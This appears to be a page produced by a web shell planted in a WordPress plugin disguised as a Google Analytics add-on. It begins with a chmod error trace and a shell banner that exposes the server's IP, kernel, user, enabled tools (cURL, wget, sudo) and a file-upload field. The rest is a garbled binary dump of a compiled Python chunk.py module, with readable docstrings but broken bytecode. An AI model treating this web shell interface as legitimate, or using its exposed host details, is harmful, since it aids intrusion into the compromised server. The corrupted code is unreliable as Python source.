Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /snap/core20/2769/lib/python3.8/__pycache__/ |
Upload File : |
U
yi; � @ s d Z G dd� d�ZdS )a Simple class to read IFF chunks.
An IFF chunk (used in formats such as AIFF, TIFF, RMFF (RealMedia File
Format)) has the following structure:
+----------------+
| ID (4 bytes) |
+----------------+
| size (4 bytes) |
+----------------+
| data |
| ... |
+----------------+
The ID is a 4-byte string which identifies the type of chunk.
The size field (a 32-bit value, encoded using big-endian byte order)
gives the size of the whole chunk, including the 8-byte header.
Usually an IFF-type file consists of one or more chunks. The proposed
usage of the Chunk class defined here is to instantiate an instance at
the start of each chunk and read from the instance until it reaches
the end, after which a new instance can be instantiated. At the end
of the file, creating a new instance will fail with an EOFError
exception.
Usage:
while True:
try:
chunk = Chunk(file)
except EOFError:
break
chunktype = chunk.getname()
while True:
data = chunk.read(nbytes)
if not data:
pass
# do something with data
The interface is file-like. The implemented methods are:
read, close, seek, tell, isatty.
Extra methods are: skip() (called by close, skips to the end of the chunk),
getname() (returns the name (ID) of the chunk)
The __init__ method has one required argument, a file-like object
(including a chunk instance), and one optional argument, a flag which
specifies whether or not chunks are aligned on 2-byte boundaries. The
default is 1, i.e. aligned.
c @ sZ e Zd Zddd�Zdd� Zdd� Zd d
� Zdd� Zddd�Zdd� Z ddd�Z
dd� ZdS )�ChunkTFc C s� dd l }d| _|| _|rd}nd}|| _|�d�| _t| j�dk rFt�z |�|d |�d��d | _ W n |j
k
r� td �Y nX |r�| j d | _ d| _z| j�� | _
W n ttfk
r� d| _Y nX d| _d S ) N� F�>�<� �L� T)�struct�closed�align�file�read� chunkname�len�EOFErrorZunpack_from� chunksize�error� size_read�tell�offset�AttributeError�OSError�seekable)�selfr r
Z bigendianZ
inclheaderr Zstrflag� r �/usr/lib/python3.8/chunk.py�__init__4 s, zChunk.__init__c C s | j S )z*Return the name (ID) of the current chunk.)r
�r r r r �getnameN s z
Chunk.getnamec C s | j S )z%Return the size of the current chunk.)r r r r r �getsizeR s z
Chunk.getsizec C s | j sz| �� W 5 d| _ X d S )NT)r �skipr r r r �closeV s zChunk.closec C s | j rtd��dS )N�I/O operation on closed fileF)r �
ValueErrorr r r r �isatty] s zChunk.isattyr c C sv | j rtd��| jstd��|dkr0|| j }n|dkrB|| j }|dk sT|| jkrXt�| j�| j | d� || _dS )z�Seek to specified position into the chunk.
Default position is 0 (start of chunk).
If the file is not seekable, this will result in an error.
r! zcannot seek� � r N)
r r"